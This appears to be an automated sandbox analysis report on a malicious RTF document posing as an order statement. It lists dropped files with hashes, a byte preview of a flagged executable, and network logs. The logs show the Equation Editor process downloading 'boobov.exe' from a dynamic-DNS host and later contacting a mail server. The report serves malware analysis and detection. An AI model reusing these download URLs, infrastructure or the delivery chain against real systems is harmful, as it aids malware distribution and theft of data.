                                                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                            C:\Users\user\AppData\Local\Temp\Tar232E.tmp
                                                                            Process:C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):152788
                                                                            Entropy (8bit):6.316654432555028
                                                                            Encrypted:false
                                                                            SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                            MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                            SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                            SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                            SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Pending Orders Statement -40064778.LNK
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Jan 28 02:29:36 2021, length=354788, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):2268
                                                                            Entropy (8bit):4.5918339824333545
                                                                            Encrypted:false
                                                                            SSDEEP:24:8rD/XTd6jFyi2ekAsqDDv3qPdM7dD2rD/XTd6jFyi2ekAsqDDv3qPdM7dV:8f/XT0jFt26qPQh2f/XT0jFt26qPQ/
                                                                            MD5:016FB75FF443766A7279CA9045AF5BDD
                                                                            SHA1:FD32D47D894E3105C74A04367F2D5EE8A91A87AC
                                                                            SHA-256:1B919601559C7502D75FC4364275964239103DBFCBA815CAA84974E8ACAF9053
                                                                            SHA-512:941629FE30E9CD0EA5B302BA6C6BF3281E1BF0D7C90638F97BA5378F34DDD57A6B49AE40093D62C6A6F6CD97347E2F55E7AFC0B25F0A1E38FEA3CB69B7E565D4
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: L..................F.... ...y.j..{..y.j..{...;..%....i...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..i..<R.. .PENDIN~1.DOC..z.......Q.y.Q.y*...8.....................P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\724536\Users.user\Desktop\Pending Orders Statement -40064778.doc.=.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.n.d.i.n.g. .O.r.d.e.r.s. .S.t.a.t.e.m.e.n.t. .-.4.0.0.6.4.7.7.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):140
                                                                            Entropy (8bit):4.736685473680344
                                                                            Encrypted:false
                                                                            SSDEEP:3:M1K++i2RyDhdpStb+i2RyDhdpSmX1K++i2RyDhdpSv:MIdi2RULpECi2RULpAdi2RULpc
                                                                            MD5:821573196FFE2311197C79E1D2FD939E
                                                                            SHA1:39CCA7E16FE3E84413C236FCDE8349E681A4CD4C
                                                                            SHA-256:EC23706907FB744BCA81DA26E10E724D5E06A4B6009F0C431110F8045EC44FB5
                                                                            SHA-512:A0BD9FC15A76FCE0AD4FA6C53661B432F8F90A200F80276A64803FD83E02582B22EC5744210B036F0E9018B24411DCFE6FD5CA02877463E3E5497F44CBBE163C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: [doc]..Pending Orders Statement -40064778.LNK=0..Pending Orders Statement -40064778.LNK=0..[doc]..Pending Orders Statement -40064778.LNK=0..
                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false
                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2
                                                                            Entropy (8bit):1.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:Qn:Qn
                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                            Malicious:false
                                                                            Preview: ..
                                                                            C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):246784
                                                                            Entropy (8bit):5.925208163230513
                                                                            Encrypted:false
                                                                            SSDEEP:3072:K/uLx1t8/TCCQKvI3zEl0JHPXzy/4ELgBmDiUvQk85lNphtv:KWt18Q2I3zMCfzt/9
                                                                            MD5:D0154FB70ABD786136AE9F68F285541C
                                                                            SHA1:42988286A1993959373A692AC455375B6AD2AE76
                                                                            SHA-256:E83D03CCD3C91744C4BC4D43A1EA9D55FC7211237F7197C33838507B92D50024
                                                                            SHA-512:8A6660F2A0A1C0A6186FEDD78CE8D5F2BA3FE504E5E0E0113116FAFE99E7604E14EE53D58A0E3B0BB780C59AB5392B6212B5B3610986DBD587BB9EBE52B1B313
                                                                            Malicious:true
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..`................................. ........@.. ....................... ............`.....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H..............................P .......................................................................................................................................................................*.r\..p(N........s.........r`..p.....sO........*.r..p......%.r..p.%.r...p.%.r..p.(<...*.r..p......%.r..p.%.r...p.%.r...p.%.r..p.(<...*.r..p......%.r=f.p.%.r...p.%.r=f.p.%.r.g.p.(<...*~~....:....(0...sg........~....*. ....*2rx..p.()...*2r...p.()...*......(....*~~....:....(
                                                                            C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc
                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):162
                                                                            Entropy (8bit):2.431160061181642
                                                                            Encrypted:false
                                                                            SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                                            MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                                            SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                                            SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                                            SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                                            Malicious:false
                                                                            Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                                                            Static File Info

                                                                            General

                                                                            File type:Rich Text Format data, version 1, unknown character set
                                                                            Entropy (8bit):4.005010844024142
                                                                            TrID:
                                                                            • Rich Text Format (5005/1) 55.56%
                                                                            • Rich Text Format (4004/1) 44.44%
                                                                            File name:Pending Orders Statement -40064778.doc
                                                                            File size:354788
                                                                            MD5:47c45cbbc8fa7c9c62efdfcadee09e99
                                                                            SHA1:e44f1f16be00551108ece175186d84ce6432a177
                                                                            SHA256:1bb9591f1ed79d19e77dd9e9b0c05ee37aa36c317e93e1d275df2a801c05afe6
                                                                            SHA512:f85529aa06ed4c492e2ab067df3519bcec86288f9f32112802785169b219bba6c36dc371516f045acbd1c9e2ea0b2099992a67d2978cb962ed14a85a9821734e
                                                                            SSDEEP:6144:iaVgbuklQVZRG1DPV9Uq+qUF9pa3C4T/JnsKxW7Cn11Y6xbZ3Icf12CLPvqSuoo:zSbT6ZyrVyq+X7l49nC7+Brc6XEH
                                                                            File Content Preview:{\rtf1854{\object14683912 14683912\objhtml\objw9136\objh7915{\*\objdata675050 {\mchr4061916.4061916\.4061916 \mchr4061916.4061916\.4061916} \..................... .fbe51715020000000b000

                                                                            File Icon

                                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                                            Static RTF Info

                                                                            Objects

                                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                            000000053h2embeddedeqUATION.3177225no

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2021 19:29:35.986691952 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.072520018 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.072607040 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.072925091 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.160597086 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354144096 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354203939 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354243994 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354281902 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354320049 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354357004 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354404926 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354439974 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354448080 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354474068 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354480028 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354484081 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354485989 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354502916 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354525089 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.354547024 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.354590893 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.363082886 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.440202951 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.440604925 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.447611094 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.447655916 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.447866917 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.447912931 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.452287912 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.452330112 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.452481985 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.452526093 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.456533909 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.456576109 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.456648111 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.456675053 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.461241007 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.461283922 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.461391926 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.461437941 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.465612888 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.465711117 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.465711117 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.465765953 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.470371962 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.470412016 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.470509052 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.470555067 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.474622965 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.474699974 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.474782944 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.474827051 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.479243994 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.479285955 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.479336023 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.479367018 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.483680010 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.483758926 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.483855963 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.483903885 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.488166094 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.488248110 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.526103973 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.526386976 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.528136969 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.528300047 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.533133984 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.533291101 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.535181999 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.535224915 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.535330057 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.535372972 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.539221048 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.539259911 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.539367914 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.539412022 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.542968988 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.543013096 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.543064117 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.543107986 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.546428919 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.546467066 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.546513081 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.546555042 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.549827099 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.549868107 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.549935102 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.549977064 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.552992105 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.553034067 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.553076029 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.553117990 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.555919886 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.555964947 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.556045055 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.556087971 CET4916780192.168.2.22172.111.202.41
                                                                            Jan 27, 2021 19:29:36.558938026 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.559011936 CET8049167172.111.202.41192.168.2.22
                                                                            Jan 27, 2021 19:29:36.559020042 CET4916780192.168.2.22172.111.202.41

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 27, 2021 19:29:35.743539095 CET5219753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:29:35.968858957 CET53521978.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:18.302427053 CET5309953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:18.358746052 CET53530998.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:18.359721899 CET5309953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:18.416305065 CET53530998.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:24.889395952 CET5283853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:24.945761919 CET53528388.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:24.946649075 CET5283853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:25.009015083 CET53528388.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:26.787317038 CET6120053192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:26.837258101 CET53612008.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:26.850505114 CET4954853192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:26.898401976 CET53495488.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:32.899270058 CET5562753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:32.947115898 CET53556278.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:32.947629929 CET5562753192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:32.995476007 CET53556278.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:42.171370029 CET5600953192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:42.229362965 CET53560098.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:52.314512014 CET6186553192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:52.362375975 CET53618658.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:58.741722107 CET5517153192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:58.801039934 CET53551718.8.8.8192.168.2.22
                                                                            Jan 27, 2021 19:30:58.801891088 CET5517153192.168.2.228.8.8.8
                                                                            Jan 27, 2021 19:30:58.852639914 CET53551718.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Jan 27, 2021 19:29:35.743539095 CET192.168.2.228.8.8.80x315eStandard query (0)cy.kl-re.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.302427053 CET192.168.2.228.8.8.80xc52cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.359721899 CET192.168.2.228.8.8.80xc52cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.889395952 CET192.168.2.228.8.8.80x4d68Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.946649075 CET192.168.2.228.8.8.80x4d68Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.899270058 CET192.168.2.228.8.8.80xd43aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947629929 CET192.168.2.228.8.8.80xd43aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.171370029 CET192.168.2.228.8.8.80xdaaeStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.314512014 CET192.168.2.228.8.8.80x535aStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.741722107 CET192.168.2.228.8.8.80x2228Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801891088 CET192.168.2.228.8.8.80x2228Standard query (0)mail.privateemail.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Jan 27, 2021 19:29:35.968858957 CET8.8.8.8192.168.2.220x315eNo error (0)cy.kl-re.comcybersng.duckdns.orgCNAME (Canonical name)IN (0x0001)
                                                                            Jan 27, 2021 19:29:35.968858957 CET8.8.8.8192.168.2.220x315eNo error (0)cybersng.duckdns.org172.111.202.41A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.358746052 CET8.8.8.8192.168.2.220xc52cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:18.416305065 CET8.8.8.8192.168.2.220xc52cNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:24.945761919 CET8.8.8.8192.168.2.220x4d68No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:25.009015083 CET8.8.8.8192.168.2.220x4d68No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.947115898 CET8.8.8.8192.168.2.220xd43aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:32.995476007 CET8.8.8.8192.168.2.220xd43aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:42.229362965 CET8.8.8.8192.168.2.220xdaaeNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:52.362375975 CET8.8.8.8192.168.2.220x535aNo error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.801039934 CET8.8.8.8192.168.2.220x2228No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)
                                                                            Jan 27, 2021 19:30:58.852639914 CET8.8.8.8192.168.2.220x2228No error (0)mail.privateemail.com198.54.122.60A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • cy.kl-re.com
                                                                            • 193.239.147.103

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.2249167172.111.202.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 27, 2021 19:29:36.072925091 CET0OUTGET //power/bo/boobov.exe HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: cy.kl-re.com
                                                                            Connection: Keep-Alive
                                                                            Jan 27, 2021 19:29:36.354144096 CET2INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Wed, 27 Jan 2021 18:29:36 GMT
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 246784
                                                                            Connection: keep-alive
                                                                            Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Nginx-Upstream-Cache-Status: EXPIRED
                                                                            X-Server-Powered-By: Engintron
                                                                            Accept-Ranges: bytes
